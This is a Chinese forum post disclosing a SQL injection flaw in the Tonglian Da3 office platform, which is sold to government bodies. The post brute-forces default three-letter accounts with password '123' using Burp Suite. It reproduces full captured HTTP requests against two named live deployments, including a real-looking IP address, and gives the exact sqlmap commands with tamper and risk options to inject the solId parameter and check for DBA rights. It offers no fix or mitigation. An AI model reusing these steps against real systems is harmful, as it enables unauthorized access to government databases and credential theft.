admin 发表于 2018-10-20 20:15:17

同联Da3协同办公平台前台通用sql injection漏洞

<p align="center" style="margin:0pt 0pt 0.0001pt;text-align:center;">
        <br />
</p>
<p align="justify" style="margin:0pt 0pt 0.0001pt;text-align:justify;">
        平台简介:
</p>
<p align="justify" style="margin:0pt 0pt 0.0001pt;text-align:justify;">
        &nbsp;
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。 <br />
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 <br />
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
</p>
<p align="justify" style="margin:0pt 0pt 0.0001pt;text-align:justify;">
        &nbsp;
</p>
<p align="justify" style="margin:0pt 0pt 0.0001pt;text-align:justify;">
        由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
</p>
<p align="justify" style="margin:0pt 0pt 0.0001pt;text-align:justify;">
        &nbsp;
</p>
<p align="justify" style="margin:0pt 0pt 0.0001pt;text-align:justify;">
        <a href="http://59.48.248.2:7197/cap-aco/#">http://1.1.1.1:7197/cap-aco/#</a>(案例2-)
</p>
<p align="justify" style="margin:0pt 0pt 0.0001pt;text-align:justify;">
        <a href="http://www.itonglian.com">http://www.XXOO.com</a>&nbsp;(案例1-官网网站)
</p>
<p align="justify" style="margin:0pt 0pt 0.0001pt;text-align:justify;">
        &nbsp;
</p>
<p align="justify" style="margin:0pt 0pt 0.0001pt;text-align:justify;">
        漏洞详情:
</p>
<p align="justify" style="margin:0pt 0pt 0.0001pt;text-align:justify;">
        &nbsp;初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
</p>
<p align="justify" style="margin:0pt 0pt 0.0001pt;text-align:justify;">
        &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
</p>
<p align="justify" style="margin:0pt 0pt 0.0001pt;text-align:justify;">
        &nbsp;
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        <img width="626" height="356" src="https://www.2k8.org/content/uploadfile/201809/23/96a4a00bfd2c4f359bca24c6bc6b3cd3.jpg" />&nbsp;
</p>
<p align="justify" style="margin:0pt 0pt 0.0001pt;text-align:justify;">
        status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
</p>
<p align="justify" style="margin:0pt 0pt 0.0001pt;text-align:justify;">
        1、案例1-官方网站
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&amp;page=0&amp;solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&amp;state=&amp;title=1111&amp;sortOrder=DESC&amp;query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&amp;_=1510060789826 HTTP/1.1
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        Host: www.XXOO.com
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        Proxy-Connection: Keep-Alive
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        Accept: application/json, text/javascript, */*; q=0.01
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        Accept-Language: zh-CN
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        Content-Type: application/json
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        X-Requested-With: XMLHttpRequest
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        Referer: http://www.XXOO.com/bizRunController/getBizRunList/42b0234e-d5dc-402d-9cef-1ce38cbae480?modCode=1008M002
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        Accept-Encoding: gzip, deflate, sdch
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba&nbsp;注入如图:
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        <img width="554" height="338" src="https://www.2k8.org/content/uploadfile/201809/23/94aeb9acd0da4e889957791d97dc8bf0.jpg" />&nbsp;
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        <img width="554" height="359" src="https://www.2k8.org/content/uploadfile/201809/23/e79e1bc3374f49389c7844278d9d9dc0.jpg" />&nbsp;
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        &nbsp;
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        &nbsp;
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        &nbsp;
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        2、案例2-某天河云平台
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&amp;page=0&amp;solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&amp;state=&amp;title=11111&amp;sortOrder=DESC&amp;query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&amp;_=1510047738662 HTTP/1.1
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        Host: 1.1.1.:7197
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        Accept: application/json, text/javascript, */*; q=0.01
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        X-Requested-With: XMLHttpRequest
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        Content-Type: application/json
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        Referer: http://1.1.1.1:7197/cap-aco/bizRunController/getBizRunList/af056885-4ae5-4e0b-8a0d-c413a786f2db?modCode=1008
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        Accept-Language: zh-CN,zh;q=0.8
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        Connection: close
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        &nbsp;<img src="https://www.2k8.org/content/uploadfile/201809/23/47eb19e64a9641a584e4a40d829e0c69.jpg" />
</p>
<p style="margin:0pt 0pt 0.0001pt;text-align:left;">
        <br />
</p>
页: [1]
查看完整版本: 同联Da3协同办公平台前台通用sql injection漏洞